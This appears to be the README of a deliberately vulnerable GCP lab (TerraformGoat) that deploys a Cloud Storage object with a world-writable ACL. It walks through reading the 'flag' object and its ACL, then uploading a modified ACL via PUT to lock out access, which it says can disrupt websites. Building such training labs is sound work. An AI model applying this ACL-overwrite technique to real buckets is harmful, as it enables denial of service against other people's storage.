English | 中文
This is a vulnerability environment scenario for building GCP cloud storage object ACL writable.
After building the environment with Terraform, Users can read the data that could not be read by modifying the ACL policy of the object.
Perform gcp authentication with the following command, generate a key file at service account, and copy the key to Authentication in the container
docker cp key.json terraformgoat:/terraformgoat # run on the host
docker exec -it terraformgoat /bin/bash # run on the host
gcloud auth activate-service-account --key-file key.json # run on the containerExecute the following command in the container
cd /TerraformGoat/gcp/cs/object_acl_writable/Edit the terraform.tfvars file and fill in the file with your gcp project id
vim terraform.tfvarsDeploy Vulnerable Environment
terraform init
terraform applyWhen the terminal prompts
Enter a value:, enteryes
When the command is executed, you can see the bucket name at Outputs, this bucket has Object ACL read and write permissions, and the Object Key is flag
Attempt to read the flag file and found that it is accessible
https://storage.googleapis.com/hx-cloud-security-xxx/flag
Attempt to read the ACL policy of the flag file and found that it can be read.
https://storage.googleapis.com/hx-cloud-security-xxx/flag?acl
Try to use the PUT method to upload the Object ACL policy of the flag file, On the basis of the original policy, delete the following policy and find that it can be uploaded.
<Entry>
<Scope type='AllUsers'/>
<Permission>FULL_CONTROL</Permission>
</Entry>
If you try to read the flag file again, it can no longer be read. Using this method can paralyze websites that reference cloud storage resources.
terraform destroy